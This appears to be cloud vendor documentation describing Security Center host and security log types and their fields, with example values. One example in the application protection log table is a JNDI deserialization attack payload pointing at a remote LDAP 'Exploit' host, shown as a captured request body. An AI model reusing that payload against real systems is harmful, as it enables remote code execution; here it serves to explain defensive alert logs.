View Security Center logs to quickly identify and respond to security events. After purchasing log storage, Security Center automatically collects security logs, which record security events, and host logs, which track host activities. This topic describes the supported log types and their fields.
Supported log types
Log types supported by different editions
Different editions of Security Center support various security capabilities, resulting in different log types. The following table the log types supported by each edition.
Editions | Supported log types |
Anti-virus, Advanced, Enterprise, and Ultimate |
|
Basic |
|
Log types supported for value-added features
When using the following value-added features, you do not need to purchase a paid edition of Security Center. You only need to activate the corresponding value-added feature. Once you activate these features and enable the Security Center log analysis feature, Security Center will support recording the following log types:
Malicious file detection logs
Agentless detection logs
Application protection logs
CSPM-baseline check logs
CSPM-cloud service configuration check logs
Log categories
Host logs
Log type | __topic__ | Description | Collection cycle |
aegis-log-login | Records logs of user logins to servers, including login time, login user, login method, login IP address, and other information. Logon logs help you monitor user activities, promptly identify and respond to abnormal behaviors, thereby ensuring system security. Note Security Center does not support recording logon logs for Windows Server 2008 operating systems. | Real-time collection. | |
aegis-log-network | Records logs of network connection activities, including server connection 5-tuple, connection time, connection status, and other information. Network connection logs help you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc. Note
| Real-time collection. | |
aegis-log-process | Records logs related to process startup on the server, including process startup time, startup command, and parameters. By recording and analyzing process startup logs, you can understand the startup status and configuration information of processes in the system, detect abnormal process activities, malware intrusions, security threats, and other issues. | Real-time collection, process startup is reported immediately. | |
aegis-log-crack | Records logs of brute-force attack behaviors, including attempts to log in and crack systems, applications, or accounts. By recording and analyzing brute-force attack logs, you can understand the brute-force attacks on systems or applications, detect abnormal login attempts, weak passwords, and credential leaks. Brute-force attack logs can also be used to track malicious users and conduct forensic analysis, assisting security teams in incident response and investigation. | Real-time collection. | |
aegis-snapshot-host | Records logs of detailed user account information in systems or applications, including basic account attributes such as username, password policy, login history, etc. By comparing account snapshot logs at different time points, you can understand the changes and evolution of user accounts and promptly detect potential account security issues, such as unauthorized account access, abnormal account status, etc. |
| |
aegis-snapshot-port | Records logs of network connections, including 5-tuple, connection status, and associated process information fields. By recording and analyzing network connection snapshot logs, you can understand the active network sockets in the system, helping you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc. | ||
aegis-snapshot-process | Records logs of process activities in the system, including process ID, process name, process startup time, and other information. By recording and analyzing process snapshot logs, you can understand the activity status and resource usage of processes in the system, detect abnormal processes, CPU usage, memory leaks, and other issues. | ||
aegis-log-dns-query | Records logs of DNS query requests, including detailed information about DNS query requests sent by the server, such as the queried domain name, query type, query source, and other information. By analyzing DNS request logs, you can understand DNS query activities in the network, detect abnormal query behaviors, domain hijacking, DNS poisoning, and other issues. Note For Linux servers with kernel versions lower than the 4.X.X series, Security Center does not support DNS request log collection and malicious DNS behavior detection. It is recommended that you consider upgrading the system kernel to a higher version to obtain comprehensive threat detection capabilities. | Real-time collection. | |
aegis-log-client | Records the online and offline events of Security Center agents. | Real-time collection. |
Security log types
Log type | __topic__ | Description | Collection cycle |
sas-vul-log | Records logs of vulnerability-related information found in systems or applications, including vulnerability name, vulnerability status, handling actions, and other information. By recording and analyzing vulnerability logs, you can understand the vulnerabilities in the system, security risks, and attack trends, and take appropriate remedial measures in a timely manner. | Real-time collection. | |
sas-hc-log | Records logs of baseline risk check results, including baseline level, baseline category, risk level, and other information. By recording and analyzing baseline risk logs, you can understand the baseline security status and potential risks of the system. Note Only records data for check items that fail for the first time, and data for check items that previously passed but failed upon re-checking. | ||
sas-security-log | Records logs of security events and alert information that occur in systems or applications, including alert data source, alert details, alert level, and other information. By recording and analyzing security alert logs, you can understand the security events and threats in the system and take appropriate response measures in a timely manner. | ||
sas-cspm-log | Records logs related to cloud security posture management, including check results, whitelist operations, and other information from cloud security posture management. By recording and analyzing cloud security posture management logs, you can understand the configuration issues and potential security risks in the cloud platform. | ||
sas-net-block | Records logs of network attack events, including attack type, source IP address, target IP address, and other key information. By recording and analyzing network defense logs, you can understand the security events occurring in the network, and then take appropriate response and defense measures to improve the security and reliability of the network. | ||
sas-rasp-log | Records logs of attack alert information from the application protection feature, including attack type, behavioral data, attacker IP, and other key information. By recording and analyzing application protection alert logs, you can understand the security events occurring in the application, and then take appropriate response and defense measures to improve the security and reliability of the application. | ||
sas-filedetect-log | Records logs of malicious file detection using the malicious file detection SDK feature, including file information, detection scenario, detection results, and other information for malicious file detection. By recording and analyzing malicious file detection logs, you can identify common viruses in offline files and Alibaba Cloud OSS files, such as ransomware, mining programs, etc., and handle them promptly to prevent the spread and execution of malicious files. | ||
aegis-file-protect-log | Records alert events detected using the core file monitoring feature, including file path, operations performed on the file, alert level, and other information. By recording and analyzing core file monitoring event logs, you can monitor whether core files are stolen or tampered with. | ||
sas-agentless-log | Records security risks detected in Elastic Compute Service (ECS), and images using the agentless detection feature, including vulnerabilities, baselines, malicious samples, and sensitive files. By recording and analyzing agentless detection logs, you can view the security risks in assets during different time periods, helping you identify and address potential threats. |
Network logs (no longer supported for delivery)
Starting March 27, 2025, the log analysis feature no longer supports the delivery of network logs, including web access logs, DNS logs, network session logs, and local DNS logs. For alternative solutions for network logs, see Alternative solutions for adding or delivering network logs.
If you have activated network log delivery, this service will end on March 27, 2025, and new network log data will no longer be delivered. The query function for network logs on the Log Analysis page in the Security Center console will be discontinued.
To query delivered network logs, you can click Advanced Management of Simple Log Service in the upper right corner of the Log Analysis page to go to the Simple Log Service console, and refer to the log field descriptions in the appendix to view the delivered network logs.
Log type | __topic__ | Description | Collection cycle |
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance. | In most cases, logs are collected 1 to 12 hours after the logs are generated. | |
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs. | ||
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance. | ||
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs. |
Host log fields
Logon logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | The IP address that is used to log on to the server. | 221.11.XX.XX |
dst_port | The port that is used to log on to the server. | 22 |
login_type | The logon type. Valid values include the following values:
| SSH |
username | The username that is used for logon. | admin |
login_count | The number of logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The name of the container. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address.
| 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The name of the parent process file. | /usr/bin/bash |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The name of the process. | nginx |
proc_path | The path to the process. | /usr/local/nginx/sbin/nginx |
proc_start_time | The time when the process was started. | N/A |
connection_type | The protocol. Valid values:
| tcp |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the parent process of the parent process. | containerd-shim |
status | The status of the network connection. Valid values:
| 5 |
type | The type of the real-time network connection. Valid values:
| listen |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Process startup logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
cmd_index | The index of a parameter in the command line. Every two indexes are grouped to identify the start of a parameter and the end of the parameter. | 0,3,5,8 |
cmdline | The complete command to start the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name related to the process. | N/A |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The name of the container. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
cwd | The current working directory (CWD) of the process. | N/A |
proc_name | The name of the process file. | ipset |
proc_path | The full path to the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The name of the user group. | group1 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The name of the parent process file. | kube-proxy |
parent_proc_path | The full path to the parent process file. | /usr/local/bin/kube-proxy |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The time when the process started. | 2024-08-01 16:45:40 |
parent_proc_start_time | The time when the parent process was started. | 2024-07-12 19:45:19 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
srv_cmd | The command line of the ancestor process. | /usr/bin/containerd |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
uid | The user ID. | 123 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Brute-force attack logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is under a brute-force attack. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server that is under a brute-force attack. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
src_ip | The source IP address. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values:
| SSH |
username | The username that is used for logon. | user |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Account snapshot logs
Field name | Description | Example |
account_expire | The date when the account expires. The value never indicates that the account never expires. | never |
domain | The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain. | N/A |
groups | The group to which the account belongs. The value N/A indicates that the account does not belong to a group. | ["nscd"] |
home_dir | The home directory, which is the default directory to store and manage files in the system. | /Users/abc |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons. | 2023-08-18 09:21:21 |
login_ip | The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons. | 192.168.XX.XX |
passwd_expire | The date when the password expires. The value never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values:
| 0 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the account. Valid values:
| 0 |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
username | The name of the user. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date when you are notified of expiring passwords. The value never indicates that no notifications are sent. | 2024-08-20 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Network snapshot logs
Field name | Description | Example |
net_connect_dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address.
| 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The ID of the process. | 682 |
proc_name | The name of the process. | sshd |
connection_type | The protocol. Valid values:
| tcp4 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The status of the network connection. Valid values:
| 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Process snapshot logs
Field name | Description | Example |
cmdline | The complete command to start the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash value of the binary file. Note The MD5 algorithm is not supported for files that exceed 1 MB in size. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The name of the process file. | assist_daemon |
proc_path | The full path to the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The ID of the process. | 1692 |
pname | The name of the parent process file. | systemd |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
proc_start_time | The time when the process started. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
DNS request logs
Field name | Description | Example |
domain | The domain name that is included in the DNS request. | example.aliyundoc.com |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiates the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiates the DNS request. | 3544 |
ppid | The ID of the parent process that initiates the DNS request. | 3408 |
cmd_chain | The chain of the process that initiates the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line of the process that initiates the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path to the process that initiates the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
time | The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiates the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Agent event logs
Field name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The version of the Security Center agent. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The type of the operating system. Valid values:
| linux |
region_id | The ID of the region in which the server resides. | cn-beijing |
status | The status of the Security Center agent. Valid values:
| online |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Security log fields
Vulnerability logs
Field name | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values:
| later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
instance_name | The name of the host. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The operation on the vulnerability. Valid values:
| new |
status | The status information. Valid values:
| 1 |
tag | The tag that is added to the vulnerability. Valid values:
| oval |
type | The type of the vulnerability. Valid values:
| sys |
uuid | The UUID of the server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
CSPM-baseline logs
Field name | Description | Example |
check_item_name | The name of the check item. | Set the shortest interval between password changes |
check_item_level | The risk level of the baseline. Valid values:
| medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
risk_level | The severity of the risk item. Valid values:
| medium |
operation | The operation. Valid values:
| new |
risk_name | The name of the risk item. | Password compliance check |
sas_group_name | The server group to which the server belongs in Security Center. The risk item is detected on the server. | default |
status | The status information. Valid values:
| 1 |
sub_type_alias_name | The alias of the subtype in Chinese. | Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check |
sub_type_name | The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the check type in Chinese. | Internationally Agreed Best Practices for Security |
type_name | The type of the baseline. For more information about baseline types, see Baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Security alert logs
Field name | Description | Example |
data_source | The data source. Valid values:
| aegis_login_log |
detail | The details of the alert. Note The value of the detail field in the log varies based on the alert type. If you have questions about the parameters in the detail field when you view alert logs, you can submit a ticket to contact technical support. | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon to an ECS instance by using an unusual account","status":0} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
level | The risk level of the alert. Valid values:
| suspicious |
name | The name of the alert. | Unusual logon - Logon to an ECS instance by using an unusual account |
operation | The operation. Valid values:
| new |
status | The status of the alert. Valid values:
| 1 |
unique_info | The UUID of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server on which the alert is generated. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
CSPM - Cloud platform configuration check logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 11 |
check_item_name | The name of the check item. | Back-to-origin settings |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
instance_name | The name of the instance. | lsm |
instance_result | The impacts of risks. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values:
| INSTANCE |
instance_type | The type of the instance. Valid values:
| ECS |
region_id | The region ID of the instance. | cn-hangzhou |
requirement_id | The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks. | 5 |
risk_level | The risk level. Valid values:
| MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to query section IDs. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to query standard IDs. | 1 |
status | The status of the check item. Valid values:
| PASS |
vendor | The cloud service provider. The value is fixed as ALIYUN. | ALIYUN |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Network defense logs
Field name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The decoded hexadecimal payload. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the blocked event. Valid values: Valid values:
| payload |
rule_type | The type of the rule that is used in the blocked event. Valid values:
| alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | The defense action. The value is fixed as block. The value indicates that the attack is blocked. | block |
payload | The hexadecimal payload. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The type of the operating system of the attacked asset. Valid values:
| linux |
proc_path | The path to the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port of the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Application protection logs
Field name | Description | Example |
app_dir | The directory in which the application is stored. | /usr/local/aegis/rasp/apps/1111 |
app_id | The ID of the application. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence_level | The confidence level of the detection algorithm. Valid values:
| low |
request_body | The information about the request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The hook. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The information about the request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log is truncated due to an excessive length. Valid values:
| false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The description of the alert. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The type of the operating system. | Linux |
arch | The architecture of the operating system. | amd64 |
kernel_version | The kernel version of the operating system. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameter. In most cases, the parameter is in one of the following formats:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The ID of the Runtime Application Self Protection (RASP) agent. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the RASP agent. | 0.8.5 |
src_ip | The IP address from which the request is initiated. | 172.0.XX.XX |
final_action | The handling result of the alert. Valid values:
| block |
rule_action | The alert handling action that is specified in the application protection rule. Valid values:
| block |
risk_level | The risk level. Valid values:
| high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was generated. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was generated. Unit: milliseconds. | 1696835955070 |
type | The type of the attack. Valid values:
| rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The UUID of the host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The group to which the server belongs in Security Center. | Group 1 |
instance_id | The instance ID of the host. | i-wz995eivg28f1m** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Malicious file detection logs
Field name | Description | Example |
bucket_name | The name of the OSS bucket. | ***-test |
event_id | The ID of the alert. | 802210 |
event_name | The name of the alert. | Mining program |
md5 | The MD5 hash value of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA-256 hash value of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values:
| 0 |
file_path | The path to the file. | test.zip/bin_test |
etag | The ID of the OSS object. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values:
| remind |
source | The check method. Valid values:
| OSS |
parent_md5 | The MD5 hash value of the parent file or the compressed package file. | 3d0f8045bb9****** |
parent_sha256 | The SHA-256 hash value of the parent file or the compressed package file. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or the compressed package file. | test.zip |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Core file monitoring event log
Field name | Description | Example |
start_time | The timestamp when the event last happened. Unit: seconds. | 1718678414 |
uuid | The UUID of the server. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The path to the file. | /etc/passwd |
proc_path | The path to the process. | /usr/bin/bash |
rule_id | The ID of the hit rule. | 123 |
rule_name | The name of the rule. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation that you want to perform on the file. | READ |
risk_level | The risk level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The permissions to run the process. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field name | Description | Example |
uuid | Server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | Instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | Public IP address of the asset. | 39.104.XX.XX |
intranet_ip | Private IP address of the asset. | 192.168.XX.XX |
sas_group_name | Asset group of the server in Security Center. | default |
start_time | Start timestamp in seconds, also used to indicate when the event occurred. | 1719472214 |
Vulnerability risk fields
Field name | Description | Example |
vul_name | Vulnerability name. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Vulnerability alias | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | Vulnerability business primary key ID. | 990174361 |
type | Vulnerability type. Valid values:
| sca |
alert_level | Vulnerability risk level. Valid values:
| asap |
instance_name | Host name. | hhht-linux-*** |
operation | Vulnerability handling action. Valid values:
| new |
status | Vulnerability status information. Valid values:
| 1 |
tag | Vulnerability tag. Valid values:
Note Tags for other types of vulnerabilities are random strings. | oval |
Baseline check fields
Field name | Description | Example |
check_item_name | Check item name. | Set password expiration time |
check_item_level | Check item risk level. Valid values:
| high |
check_type | Check item type. | Identity authentication |
risk_level | Risk item level. Valid values:
| low |
operation | Operation information. Valid values:
| new |
risk_name | Name of the check item with risk. | Password policy compliance detection |
status | Check item status information. Valid values:
| 1 |
sub_type_alias_name | Subtype alias (Chinese). | Alibaba Cloud Standard-CentOS Linux 7/8 Security Baseline |
sub_type_name | Baseline subtype name. For baseline subtype values, see Baseline types and subtypes. | hc_centos7 |
type_name | Type name. | hc_best_secruity |
type_alias_name | Type alias (Chinese). | Best security practices |
container_id | Container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field name | Description | Example |
alert_level | Alert event risk level. Valid values:
| suspicious |
alert_name | Malicious sample alert name. | Suspicious Process-SSH-based |
operation | Operation information. Valid values:
| new |
status | Malicious sample risk status information. Valid values:
| 0 |
suspicious_event_id | Alert event ID. | 909361 |
